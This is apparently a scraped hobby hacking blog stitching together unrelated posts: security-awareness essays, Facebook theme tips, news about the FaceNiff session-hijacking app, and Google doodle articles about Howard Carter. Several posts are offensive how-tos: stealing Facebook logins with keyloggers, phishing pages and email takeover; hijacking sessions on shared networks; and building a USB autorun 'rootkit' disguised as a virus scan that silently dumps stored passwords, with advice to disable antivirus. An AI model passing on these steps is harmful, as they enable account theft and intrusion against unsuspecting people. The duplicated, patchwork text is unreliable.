Welcome To The Hacker Club 4U

On This Blog Now You can get knowledge about how to to do hacking and also Know how to prevent from hacking and know many tips And tricks of computer and internet

Hacking

Click Here To Know Many Tricks and Tips Of HACKING facebook,twitter and other accounts and passwords

Hacking Safety And Security

Click Here to know how to protect your computer and inetrnet from hacking and know hacking safety and security tips and tricks

Facebook And Twitter

Click On Picture For TWITTER And Click On This Tittle For FACEBOOK .Hacking And Security Tips Of facebook and twitter.Know how to byepass facebook login and twitter login

Gmail And Yahoo

Click On Above Picture For GMAIL Hacking And Security Tips . And.Click On This Title For YAHOO Hacking and security tips


Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Computer Hacking Laws: Are These Laws Really Effective?

The news said that another person had their identity stolen. It happened again. You might even know of someone that had it happen to them. We often hear of percentages - and they are surprisingly high.
Enforcement is taking place, but we have to wonder if computer hacking laws are really having any effect against cyber hacking. This article will show what is being done against cyber crime.
Defining Cyber Crime
Hacking has a rather simple definition to it. Basically it is defined as the unauthorized use of a computer - especially when it involves attempting to circumvent the security measures of that computer, or of a network.

Hacking is not difficult to learn. Unfortunately, it may be too easy for someone that has a little time on his hands. This becomes especially obvious when it is found that a number of the hackers, at least those that are caught, are often only in their teens.

Beyond this, there are two basic types of hacking. Some only hack because they want to see if they can do it - it is a challenge to them. For others, however, it becomes an attack, and they use their unauthorized access for destructive purposes. Hacking occurs at all levels and at all times - by someone, for some reason. It may be a teen doing it to gain peer recognition, or, a thief, a corporate spy, or one nation against another.
Effectiveness of Computer Hacking Laws
Like any other law, the effectiveness must be determined by its deterrence. While there will always be those that want to see if they can do it, and get away with it (any crime), there are always the many more who may not do something if they are aware of its unlawfulness - and possible imprisonment.

In the early 1990's, when hacker efforts stopped AT&T communications altogether, the U.S. Government launched its program to go after the hackers. This was further stepped up when government reports (by the GAO) indicate that there have been more than 250,000 attempts to hack into the Defense Department computers. First there were the laws - now came the bite behind it. One of the effects of computer hacking brought about focused efforts to catch them and punish them by law.

Then, more recently, the U.S. Justice Department reveals that the National Infrastructure Protection Center has been created in order to protect our major communications, transportation and technology from the attack of hackers. Controlling teens and hackers has become the focus of many governmental groups to stop this maliciousness against individuals, organizations, and nations.

How To Avoid Computer Viruses?

Computer viruses are as old as the personal computer. So, in order to prevent computer viruses, every PC user needs to acquire determined computer skills. For example, how to install programs, make software upgrades, configure a firewall or how to setup an anti-spyware program.
All of these skills will help you avoid computer viruses. However, if we want to fight our enemy effectively, we need to know what it is.
What Is A Computer Virus?
A computer virus is a software program that has been created by a human. The intention of the virus is to cause chaos and destruction to the computer. Although most of the cases it is limited to the software, there have been some instances in which a virus had damaged a piece of hardware.

Fortunately, hardware damage is very scarce. The only way in which a virus could damage a piece of equipment is by exploiting a glitch in the programming. For example, it could slow down the speed of the processor's fan. That way the processor overheats and melts down.
How To Prevent Computer Viruses
How can we prevent computer viruses is the big question that millions of users make everyday. The first rule in this eternal battle for computer security is to have an up-to-date antivirus. Notice the word up-to-date. That means that your antivirus software needs to be updated every day. Viruses are always appearing, so do not sub estimate them. In less than 24 hours your antivirus could be obsolete.

The next important rule is still related to actualizations. Although you may have your antivirus updated, that doesn't mean that there are other weaknesses in your system. As a matter of fact, there isn't an unbreachable computer. Even the most expensive system can be cracked by an expert.

So, it doesn't matter if you have a guardian dog tied at the front entrance of your house if your windows are open. That's why the rest of your software needs to be updated. The first piece of software that needs to be actualized is the operating system.

Almost eighty percent of the world uses Microsoft software. Hence, it is the favorite victim of black hat hackers. Configure your Windows configuration so it can make automatic actualizations that can prevent computer viruses.

The same thing goes for productivity software like Microsoft Office or even entertainment software like computer games. All software is under constant changes once it is delivered into the market. Consider the millions of possible configurations that a computer program needs to affront once it is introduced.

Is My Computer Safe From Hackers


Is A Hacker Is Using Your Computer

A good friend of mine called me one day and told me his computer was running particularly slow and the odd thing was it was worse in the evening. I took a look at his computer and found that someone had got into it and was storing large (I mean Large) amounts of Pornography, Stolen Software, Music and Videos, on it. Most "Hackers" are not looking to do something to your computer that you will immediately be aware of. They are looking for what is called "staging areas" where they can store things for distribution or later use. Can you imagine how my friend felt once I showed him what was on his computer! This happens all the time. There are organizations out there who are paid by the Entertainment Industry, the Government, and other institutions who are looking for this type of issue. If they locate these things on your computer, trying to prove that you had nothing to do with it could be a pretty difficult thing to do.

Are My Computers Safe From Hackers? 

The meaning of the term "HACKER" has really changed over the years.  Early on anyone who was considered a "HACKER" was someone who new the intricate workings of computers and various technology.  Someone who was considered to be a guru at what they did whether it be a programmer who wrote software or someone who knew everything there was to know about a particular Operating System.  These day's the moment someone hears the word "HACKER" it conjures up many thoughts and images.  Some people imagine a teenager sitting home writing programs to break into business computers or their school.  Others may imagine someone who attempts to access online computer systems such as Banks or Stores to commit fraud and make off with millions of dollars.  The fact is, all the above are pretty much true images of a HACKER.  It just depends on who it applies to!

What Can Hackers Do?

A few years back I'm sure we all remember hearing or reading about what websites were defaced that given week.  This in itself can be embarrassing for the website owner and was very prevalent.  It's not that this sort of thing does not happen anymore but it is eclipsed but the more serious things that take place.  Banks being defrauded by unscrupulous employees, Online Stores having their patrons credit card information ripped off, and a host of other more serious actions.
The reality is that as network systems become more complex and widespread, the opportunities for those who wish to compromise or HACK computers become much greater.  Take a look at this Threat and Trend graphic.  It will layout just a few entry points and opportunities for hackers!
As a home or small business computer user there are many ways you could be at risk.  Many people store their financial information on their computers using a simple spreadsheet or document, or maybe something like Quicken / QuickBooks accounting.  Many people store all their logins and passwords in plain text documents on their computers.  How many people store information regarding their medical conditions on their computers.  Computers are there to make our lives more simple and provide us with a means to store all of our most important information.  What if this information were in the hands of someone else?  What could happen;
  • Is it possible for someone to assume my identity if they access the above information;
  • Can someone find out what all of my logins and passwords are;
  • As a business owner do I need to be concerned about corporate fraud;
  • Is it possible for a hacker to steal my companies intellectual property;
  • Can an unauthorized person access my company's sales information including clients and prospects;
  • And, as a home user, or small business owner, could I be held liable for something someone else does with my computer?
The answer to all the above is, yes!  If your computers are not properly configured, kept up-to-date with patches, or secured against the most common types of attacks you are at risk!
Take a look at the following Threat Spectrum to get an idea of the potential risks!
There are new vulnerabilities for computers found almost everyday.  If you are not diligent in keeping your computers up to date and secured you can expect (it's just a matter of time), that in one way or another your system will be compromised.
Over the years, we have seen just about everything under the sun when performing small, medium, or large computer security assessments;
  • Home computers being used to relay information and stolen software;
  • Business computers being used to store stolen software as well as distributing it;
  • Employees using their work computers to run businesses such as pornography sites;
  • Ex-employees still accessing their work computers because of the lack of security;
  • People trying to extort or intimidate others using information they gathered from unsecured computers;
  • The potential for civil and criminal legal action against users for participating in malicious tasks;
and that's just to name a few of the things we have seen!
Don't underestimate what can happen to you.  Human beings are very risk adverse however we are also very bad at determining the real risks.  Many people are afraid to fly in planes but have no qualms about climbing up a 10 foot later to change old ceiling fan without cutting the electricity first. You have more of a chance climbing that ladder, getting shocked, falling and breaking your neck than going down on a plane. This seems to apply to many methods of analyzing risks.
Think about this. In testing where we placed out-of-the-box computers on the Internet it takes approximately 15 to 30 minutes before it's hacked or compromised in some way or another.

How Do Hackers Do it?

Although this section of this article could be a book in itself (and will be), hackers have many tools available to them to perform their tasks.  Many of these tools are available free on the Internet.  You just need to know what you are looking for and where to look for it.
When hackers find new ways to break into computers or defeat certain security measures they will often write automated tools they can then use and distribute to other hackers.  Again, many of these tools are available on the Internet and just about anyone can use them.
In many cases, because of the lack of security, many hackers don't need special tools to access your computer.  The Operating System and the commands that are available may be all the hacker needs to remotely access your computer.
Remember, although it is not possible to configure most systems to be 100% secure, there are many steps that you can take, some simple and others drastic, to create a deterrence.  Hackers, unless they have the motivation, no limit on time, and no limit on cash, will typically search for the easiest target!
Don't give them the opportunity!

Why Should I be Concerned?

As you can see above, there are many reasons to be concern.  As a home user or small business, you should be diligent and protect yourself.  This does not mean that you should consume yourself with these efforts.  You should be diligent in your actions.  Taken even the most basic actions to secure your computers can help.
  • Protect information about your identity;
  • Use strong passwords when setting up user accounts;
  • Change your passwords on a frequent basis and don't give them out to anyone;
  • Update you computers Operating System with patches;
  • Install Anti-Virus software and keep it up-to-date;
  • If you do not have a hardware Firewall install a personal Firewall (The latest versions of Windows XP has a basic Firewall built in);
  • Install Anti-Adware / Spy-ware software and keep it up-to-date;
  • Don't assume that since the computer you use at home is just a home computer that you don't need a password to access it.  Especially if you are using Wireless Networking (That's a whole other story).

Conclusion

As you can see, everyone should be concerned about securing there computers against the potential of compromise of being hacked.  Believe me, you don't want to find yourself trying to figure out what to do next once your system has been compromised.  It is not a pleasant experience.

What is Ethical Hacking: An Introduction

Ethical Hacking: An Introduction

Whenever term hacker comes before many people consider it as a guy sitting inside a room or garage with a bottle or beer and a Laptop or Desktop doing wonders on click of buttons. But the reality check is hacking is not that easy as portrayed in movies and television and term hacker doesn't mean a computer criminal.

So here first of all we'll clear all our misconceptions related to words hackers and hacking.

From Where This Word Came:
The word hacking has history in late 1960's, the time when computers were nothing but mighty pieces of machines and a computer just meant a machine that can compute. Electrical and Electronics geeks used to optimize circuits to make any system/circuit work faster, better and reliably. The job they used to do on circuits was known as hack. With time computer geeks also started finding way out to optimize their system to work better so in fact hacking was nothing but always a kind of reverse engineering. With time in professional world a word hacker got meaning, a person who is highly skilled in hardware, software and networking components. Then movies started portraying hackers do only dirty works and hence today the word hacker has a negative face according to people. No matter how the word met to a dreadful end a hacker always had all qualities that was first put forward in its definition may the be criminal or ethical. Criminal hackers are also known as Crackers.

Types Of Hackers:

White Hats: White hat hackers are good guys who use their hacking skills for defensive purposes. Organizations and industries pay them high salaries to protect their systems and networks from intrusion.

Black Hats: Black hats are actually bad guys in filed. Their main job is to breach security and make money. They make money by using their hacking skills for offensive purposes.

Grey Hats: Gray hats are hackers who work for offensive and defensive purposes depending on situations. They are hired by people to intrude and protect systems.

Hactivist: A hacktivist is kinda hacker who thinks hacking can bring out some social changes and hacks government and organizations to show his discomfort over some trivial issues.

Suicide Hackers: Suicide hackers are those who hack for some purpose and even don't bother to suffer long term jail due to their activities. They can be bad as well as good.

Script Kiddie: A script kiddie is a person who boasts breaking system using scripts and codes written by others though he hardly knows what the code does.

Phreak: It is a person who tries to intrude systems for fun or malicious personal activities. Mostly they are children of age 12-15 who don't even know wrong consequences of hacking.

Types Of Hacking:

Local Hacking: This type of hacking is done when a hacker has full access to the system to implant a virus, keylogger and RATs

Remote Hacking: Remote hacking is done on a remote system using Internet.

Social Engineering: Social Engineering is kinda interacting skill that a hacker uses to manipulate people giving out sensitive information. Its kinda trick done using good verbal, social skills and understanding.

Terminologies Used Under Hacking:

Threat: A threat is an environment or situation that could lead to a potential breach of security. Ethical hackers look for and prioritize threats when performing a security analysis.

An Exploit: An exploit is a piece of software that takes advantage of a bug, glitch, or vulnerability, leading to unauthorized access, privilege escalation, or denial of service on a computer system.
Vulnerability: A vulnerability is an existence of a software flaw, logic design, or implementation error that can lead to an unexpected and undesirable event executing bad or damaging instructions to the system. In easy word vulnerability is weakness in system.

Payload: Payload is agent that helps in taking advantage of vulnerability in remote hacking.

Attack: An attack occurs when a system is compromised based on a vulnerability.
Types Of Attack:

1.Operating System Attack
2.Application level Attack
3.Shrink Wrap Code Attack
4.Misconfiguration Attack

Operating system attack is attack done on specific type of OS. Such attack is done using flaws in programs and services shipped with OS. Application level attack is done over faulty coding practices done over software during its development. Shrink Wrap Code attack are attacks done over UN-refined scripts used for making task simpler. Last is misconfiguration attack, it is kinda attack which is done over mis-configured system or a system with default settings.


Work Of An Ethical Hacker:
Job of an ethical hacker is to use all his skills and tools used by malicious hackers to find vulnerabilities in system and then provide it security against those vulnerabilities.

Conclusion: At last what I want to tell, nothing happens in clicks of buttons. A hacker is highly skilled person in field of computing who usually have ample knowledge about software, hardware, OS, networking and programming. A hacker may it be criminal or ethical has immense patience, determination, organization, discipline and persistence. An attacker may spend months of time planning, analyzing and executing an attack. This shows his level of dedication to achieve whatever goal he/she has set. A person can never become a good hacker unless he have all above qualities.

Note: Now onwards we will cover hacking as our main stream topic on this blog. Real hacking is never done over lamers who hardly knows about security, it is done over a person who is highly skilled as you are. You can never learn hacking until you do some practical and gain knowledge about field so now onwards I urge you to perform practicals that will be now posted on this blog on your own system. Next no tutorial will be taken as a lamer so they will be in possible higher details, so this may happen that you may not understand something. Rather than keeping yourself mum I plea you to please ask whenever you encounter a problem or get bothered by topic. Whenever I 'll post on hacking I 'll try to keep a theoretical and one practical tutorial, you are requested to read both and grasp matter completely. Thanks for visiting and please tell are you clear with all points discussed or need some explanation on your difficulty.

How to create a Facebook cover photo on your Android device

Finding the perfect cover photo for your Facebook Timeline while on the go seems near impossible. Using an Android app, you can upload and create your Facebook cover photo directly from your Android device.
Shortly after posting about how to create a Facebook cover photo on the iPhone, I found an Android app that allows you to create and upload a cover photo straight from an Android device.
The app, Facebook Timeline Covers: D33P, is free. Once you upload your cover photo creation, however, it will be stamped with a watermark promoting the app. Let's take a look at how the app works.
(Credit: Screenshot by Jason Cipriani)
The app has a straightforward approach; after launching and allowing the app to access your Facebook account, you cap tap on either the blank cover photo or profile picture to choose which section you would like to edit.
(Credit: Screenshot by Jason Cipriani )
You can browse some user-generated cover photos, or take a photo from your Facebook News Feed, a photo from either your or your friends' Facebook photos, or a photo from your Android device.
(Credit: Screenshot by Jason Cipriani )
Once you've chosen your cover photo and/or a profile picture, you're allowed to preview what it will look like as a finished product on Facebook (minus the watermark, which is conveniently not shown until after you upload your cover photo).
(Credit: Screenshot by Jason Cipriani )
You will need to log in to your Facebook account, view the album(s) the app has created for you, and set the newly uploaded photos as either your cover or profile picture, respectively.
A word to the wise: if you aren't going to change your profile picture, just leave the profile pic section blank in the app. If you don't, you will have a new album created with your profile picture being duplicated each time you upload a cover.

Facebook Layouts - How to Change Facebook Theme?

Unlike other social networking sites like Orkut, Twitter and Myspace, Facebook has not officially released features for changing your Profile Theme. Whether you like or not, you need to adjust yourself with the default theme. But using Firefox and installing add-on, you can customize the looks, colours and theme of your Facebook Profile. This however is visible only to you and not your friends.







I have got two ways of changing your Facebook profile theme. One is using the Greasemonkey Add-on and the other using the Stylish add-on. Here is how you can change your theme using either of these two:

1)Using Greasemonkey Add-on:

  • First ensure you are using Firefox browser and then install the Greasemonkey Add-on.
  • Restart firefox and Visit this page with lots of Themes.
  • Click on the favorite theme you like and install the script.
  • After you load facebook.com you can view the change the Facebook theme.
2) Using Stylish Add-on:
  • Ensure you are using Firefox and then install the Stylish Add-on.
  • Restart Firefox and repeat the process as shown in Using Greasemonkey Add-on
Apart from scripts in above listed site, you can check out these sites for other themes:
1) Some themes on Userscripts.org.
2) Facebook Fixer which enhances facebook with bigger picture, download viedeo options and more.
About Stylish Add-On



Change Facebook Theme
This is the Ferrari theme. More themes are available for you to choose.


Requirement: The basic requirement for this to work is to have Mozilla Firefox 3.5 or higher.

Steps to achieve this: The following steps should be carried out to successfully change Facebook theme.

  1. Open Mozilla Firefox and install 'Stylish' addon.
  2. Follow the basic steps to install the addon.
  3. Restart Firefox after successfully installing the Stylish addon.
  4. Login to your Facebook Account and click on the small 'S' button in your Firefox status bar.
  5. Click on "Find Styles for this Site" to open a new tab with free themes to use for Facebook.
  6. Click on any theme and a preview will be shown.
  7. If everything is fine in the previewed theme, click on "Install with Stylish" button at the top right corner of the page.
  8. A dialog box will open.
  9. Click on Install in the dialog box.
Stylish Button


facebook theme change

Install with stylish

Installing Ferrari theme for Stylish Firefox

PLEASE DON'T FORGET TO CLICK ON SUBSCRIBE BUTTON GIVEN BELOW.

Facebook Layouts - How to Change Facebook Theme?

Please Click On Subscribe Button Give Below






Unlike other social networking sites like Orkut, Twitter and Myspace, Facebook has not officially released features for changing your Profile Theme. Whether you like or not, you need to adjust yourself with the default theme. But using Firefox and installing add-on, you can customize the looks, colours and theme of your Facebook Profile. This however is visible only to you and not your friends.







I have got two ways of changing your Facebook profile theme. One is using the Greasemonkey Add-on and the other using the Stylish add-on. Here is how you can change your theme using either of these two:

1)Using Greasemonkey Add-on:

  • First ensure you are using Firefox browser and then install the Greasemonkey Add-on.
  • Restart firefox and Visit this page with lots of Themes.
  • Click on the favorite theme you like and install the script.
  • After you load facebook.com you can view the change the Facebook theme.
2) Using Stylish Add-on:
  • Ensure you are using Firefox and then install the Stylish Add-on.
  • Restart Firefox and repeat the process as shown in Using Greasemonkey Add-on
Apart from scripts in above listed site, you can check out these sites for other themes:
1) Some themes on Userscripts.org.
2) Facebook Fixer which enhances facebook with bigger picture, download viedeo options and more.
About Stylish Add-On



Change Facebook Theme
This is the Ferrari theme. More themes are available for you to choose.


Requirement: The basic requirement for this to work is to have Mozilla Firefox 3.5 or higher.

Steps to achieve this: The following steps should be carried out to successfully change Facebook theme.

  1. Open Mozilla Firefox and install 'Stylish' addon.
  2. Follow the basic steps to install the addon.
  3. Restart Firefox after successfully installing the Stylish addon.
  4. Login to your Facebook Account and click on the small 'S' button in your Firefox status bar.
  5. Click on "Find Styles for this Site" to open a new tab with free themes to use for Facebook.
  6. Click on any theme and a preview will be shown.
  7. If everything is fine in the previewed theme, click on "Install with Stylish" button at the top right corner of the page.
  8. A dialog box will open.
  9. Click on Install in the dialog box.
Stylish Button


facebook theme change

Install with stylish

Installing Ferrari theme for Stylish Firefox

Awesome News – Facebook Acquires Face.com


Facebook has acquired Face.com! Our mission is and has always been to find new and exciting ways to make face recognition a fun, engaging part of people’s lives, and incorporate remarkable technology into everyday consumer products. If you’re anything like us, Facebook is a part of your life every single day.  We keep up with our friends and family, share interesting (or mundane) experiences from our daily lives, and perhaps most importantly for us, we share a LOT of photos.


We love building products, and like our friends at Facebook, we think that mobile is a critical part of people’s lives as they both create and consume content, and share contentwith their social graph. By working with Facebook directly, and joining their team, we’ll have more opportunities to build amazing products that will be employed by consumers – that’s all we’ve ever wanted to do.  :)

Now, lots of developers use Face.com technology to power various apps and make wonderful products.  We love you guys, and the plan is to continue to support our developer community.  If there are new developments you can expect to hear from us here, on the developer blog, and through our developer newsletter.
Thank you to all of our supporters, our amazing dev community, to our employees and to our friends and family who have seen us through many long days and longer nights. The next steps are going to be exciting for all of us.

Android app hacks Facebook and Twitter accounts in seconds

Someone who happens to be connected to the same Wi-Fi network as you could hack your Facebook or Twitter accounts in seconds — just by downloading an Android app and tapping a button.
Engadget reports that an Android app called FaceNiff is basically turning the process of hacking social media accounts into a laughably simple process. It uses a technique called cookie-jacking — meaning that it essentially sniffs out and copies the security token which identifies you to a site — and basically functions just like the sneaky FireSheep Firefox extension which caused security panic a few months ago.
As you can see in the video demonstration below, all that someone with malicious intent needs to do is install FaceNiff on a rooted Android device, connect to a Wi-Fi network, open the app, and wait for someone to log into Facebook, Twitter, YouTube, or another supported site. The instant that happens, the app will present access to the victim's account and allow the hacker to use it just as if he or she'd logged into it personally.
So what exactly can you do to keep yourself safe? The same thing you did to protect yourself from FireSheep attacks: Watch out for shady Wi-Fi networks and use HTTPS.
As FaceNiff works on secured and unsecured Wi-Fi networks — this means that WEP, WPA-PSK, or WPA2-PSK enabled networks are vulnerable as well — you really need to be careful. Do you trust whoever set up the network you're logging on to? Do you even know who runs it? Think twice about using free public networks.
Simple paranoia and vigilance isn't enough to keep you safe though. You need to actually take some steps to secure your accounts and services.
We've got instructions on how to lock down your Facebook account with HTTPS here and a quick guide on protecting your Twitter account here. If you haven't already gone through those processes, do it now. It'll only take a few moments and half a dozen clicks, but it'll let you use a more secure version of each service.

How To Hack Someone's Facebook With Your Android

Firesheep caused quite a stir when it was released last October, giving both hackers and non-hackers instant access to people's account information when on a public Wi-Fi connection.
When logged into an insecure website on the same network as someone with Firesheep, you're giving them access to the cookies that keep you logged in. This is called session hijacking, and grants them easy access to your accounts, like Facebook, Flickr and Twitter. Now, there's an even easier way to do this—a mobile way.
(Spencer E Holtaway)
A recent Android application called FaceNiff can hijack unencrypted login credentials from users on the same Wi-Fi network. But here's the kicker: It also works on networks encrypted with WEP, WPA or WPA2 protection. In order to use FaceNiff, your Android smartphone must first be rooted (here's a list of devices confirmed to work). Right now, FaceNiff works with Amazon, Facebook, Twitter, YouTube and Nasza-Klasa, but more are sure to follow. A video with it in action is below.
And now check out the video below for instructions on installing the FaceNiff application on your rooted Android device, then using it to hijack Facebook accounts. Apparently, the APK only works on three accounts at a time. For unlimited access, you have to buy the application via PayPal.
The FaceNiff website does state this app as being "for educational purposes only," but it's highly doubtful that was the intention.

Android app makes hacking Facebook easy

A new app allows Android-based smartphones to hack into the Facebook or Twitter accounts of other users using the same Wifi network.

FaceNiff gives hackers access to a user's contact details, as well as those of all their friends - a phisher's dream. Developed by Polish computer science student Bartosz Ponurkiewicz, it needs to be loaded onto a jail-broken Android device.
"It's kind of like Firesheep for Android. Maybe a bit easier to use (and it works on WPA2!)," he says.
Ponurkiewicz claims that it works not only on open networks, but also on those secured by the WEP, WPA-PSK and WPA2-PSK network protocols - although not those accessed via https. This is of course an option on Facebook and Twitter, but is not activated automatically.

And it can be used to access the personal information of users of Facebook, Twitter, YouTube and Amazon. Ponurkiewicz says his free version gives access to three hacked profiles, but that he'll sell the unlock code for more through PayPal.
He does add a little disclaimer on the site: "Legal notice: this application is for educational purposes only. Do not try to use it if it's not legal in your country." Hmm.

How to hack a facebook account. all tricks listed.

Facebook hacking
Facebook accounts have a large demands for hacking as they are much more personal than any other email accounts. The Facebook accounts are also safer than any other thing on the net and thus it is really hard to hack them. But, as there are hacks and cracks for everything on the net. Here are we with some of the best Ideas and tricks to hack a facebook account.
Facebook accounts have a hell of a work to do and much more to be followed but the tricks here are much simpler. You may also need access to the victim’s computer to be able to do that. One of the important things that you may also need to know is that the facebook accounts allow only three accounts and also you need to have only two trials in one average day.
The tricks that you need to do always include that you should be a friend of the victim on facebook and also you need access to its profile. It is harder if the victim have locked his/her facebook profile to all of the friends only. Also facebook hacking is only possible if you are able to understand some codes and also know how to write some. Here are the original facebook hacking tricks on blogogeek.
So, trying to hack a facebook account is actually not so hard. Actually, maybe it just needs some of the wits and social info of the victim.
Here we go:

Keylogger

How to hack a facebook account?

There are three ways in which you can hack somebody’s facebook account. Listed below are the tricks:

#1 : Key Logger : Ofcourse, the name is new to you. Actually, it is a hacking software available for free and known to some tech-pros only. What the software actually does is only record the keystrokes of the victims keyboard and thus reveals you the password of your enemy. Even, you can go for the keystrokes and come to know the password very easily.
Now, you need to access to the personal computer in which the user access his/her facebook account. Maybe, it is difficult, but believe me, it is excellent when you use it on a cyber cafe. So, start hacking now with this wonderful tool.

#2 : Phishing : This trick is way harder than the previous trick and is still more effective in all ways. This is not so easy as it looks. What you need to do is to be excellent in coding (PHP, Java, Forms and HTML). Thus, this one is not for starters. But, you can still try it out by placing your form ( For example: Login form) for your hack on a google sites page or any other part of your blog.
The phishing scam is way to effective and useful as it doesn’t leaves you with clues but the original password. The phishing pages have a login form on them or even the whole layout looks like the facebook login page, when the victim tries to login to his account through that login form. It makes one of the copy of the entered data to the hackers account or mail and even redirects it to the Facebook page without leaving any evidence.

#3 : The Primary mail hack : If you want to hack the account of your very close friend. Then, why don’t you start with this trick. The trick includes you to enter the primary mail ID as your personal mail Id so that you can have access to the mail anytime you want and anyhow you want. You may even need the user/victim to enter your mail Id in the primary mail.
Thus, whenever you want access, you can click on forgot password and also use the email conformation link in your mail account.

So, these were some of the most liked and shared tricks of Facebook hacking, if you want any of the tricks a little to the next step. Please contact us. We are pretty sure that you know now how to hack a facebook account. Thanks for reading and keep coming :)

How To Scure Hacking Facebook And Twitter On Shared Computers.

    
Have You Ever accessed Facebook or Twitter in cyber cafe's or your office or your school? If Yes then there are chances that your Facebook or twitter account was hacked then and there. By the teacher, your boss or the cafe owner. 




I've discussed just this trick here. You don't need to be a programming expert from that, anyone with basic knowledge of computers can do it. 
                                                                                                           
First there's a thing maybe you have noticed already that whenever you open Facebook or twitter the web address is like "http://www.facebook.com"  and whenever you have browsed GMAIL note the difference. its like "https://www.gmail.com". So as you have seen Gmail uses a secure server to conncet to the net, while Facebook or twitter do not. 




So what you need to do is:
Download the below plugin from the below link
Download Plugin


Once Installed A sidebar would open on your Firefox browser. So that whenever people login into there account, you can easily login into there account too. The thing is that the computers must be connected through data-cable, Wifi like in cyber cafe's.
Enjoy this little hacking. And please pass comments.

Howard Carter celebrated by Google

howard-carter
The birthday of Howard Carter is celebrated by Google today.
Carter was already a distinguished archaeologist and Egyptologist, when he became famous for his discovery of the Tomb of Tutankhamun, the most intact Pharaonic tomb ever found.
At age 17 he began recording tomb decorations of the Middle Kingdom period, and then a year later, in 1892, he began work in Armana, documenting what remained of the capital city of Akhenaten – the father of Tutankhamun.
On 4 November 1922, Carter discovered the entrance of what was then designated as KV62. Noting that the tomb seals were intact, he contacted Lord Carnavon, who had funded Carter’s work for nearly 15 years, to come and enter the tomb as it was opened directly.
On 26th November, Carter breached the seals, revealing the massive horde of ancient treasure still intact.
The discovery caused a sensation and resulted in a massive cultural interest in Ancient Eygpt. The treasures from the tomb were exhibited around the world in the years after, before mostly being put on permanent display in the Egyptian Museum of Antiquities in Cairo.
The clearance of the tomb with its thousands of objects continued until 1932. Following his sensational discovery, Howard Carter retired from archaeology and became a part-time agent for collectors and museums.
Howard Carter died of lymphoma, a type of cancer, in Kensington, London, on 2 March 1939 at the age of 64. On his gravestone is written: “May your spirit live, May you spend millions of years, You who love Thebes, Sitting with your face to the north wind, Your eyes beholding happiness”.

Howard Carter celebrated in Google doodle

Google homepage graphic pays tribute to archaeologist who discovered Tutankhamun's tomb in 1922

Howard Carter celebrated in a Google Doodle
Howard Carter celebrated in a Google doodle. Photograph: Screengrab
The birthday of Howard Carter, who discovered the tomb of Tutankhamun in 1922, is celebrated in the latest Google doodle, a colourful graphic depicting the British archaeologist admiring an array of ancient Egyptian treasures.
The unearthing of the tomb, which had been undisturbed for more than 3,000 years, was the first time that the final resting place of a pharaoh and all his treasures had been found by modern-day archaeologists.
Carter, who was born on 9 May 1874 in London, originally trained as an artist and was sent to Egypt at the age of 17 to assist in the excavation and recording of ancient Egyptian tombs. He was appointed as the first chief inspector of the Egyptian Antiquities Service (EAS) in 1899 and supervised a number of excavations at Thebes, now known as Luxor, before he was transferred in 1904 to the Inspectorate of Lower Egypt.
He was employed from 1907 by Lord Carnarvon to supervise his Egyptian excavations but came under pressure to make a major breakthrough after what the aristocrat regarded as a series of disappointing results.
It came in November 1922, when Carter wrote in his pocket diary: "Discovered tomb under tomb of Ramsses VI investigated same & found seals intact."
He is said recorded as having made the breach into the tomb with a chisel his grandmother had given him for his 17th birthday.
Asked by Carnarvon: "Can you see anything?", archaeologist replied with the now-famous words: "Yes, wonderful things."
Carter then became the first human in 33 centuries to enter the tomb, and spent years documenting the thousands of artefacts from the tomb.
A total of 5,398 objects were found, covering every aspect of ancient Egyptian life, from weapons and chariots to musical instruments, clothes, cosmetics and a treasured lock of the royal grandmother's hair.
He died from Lymphoma in 1939 at the age of 64, just seven years after his excavation ended, and before he could fully publish his findings.
Carter's complete records of the excavation were deposited in the Griffith Institute Archive at the University of Oxford, which has been building an online database.

How to Sniff Passwords Using USB Drive


Hack Password using USB DriveAs we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.
MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename. 
Here is a step by step procedre to create the password hacking toolkit.
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
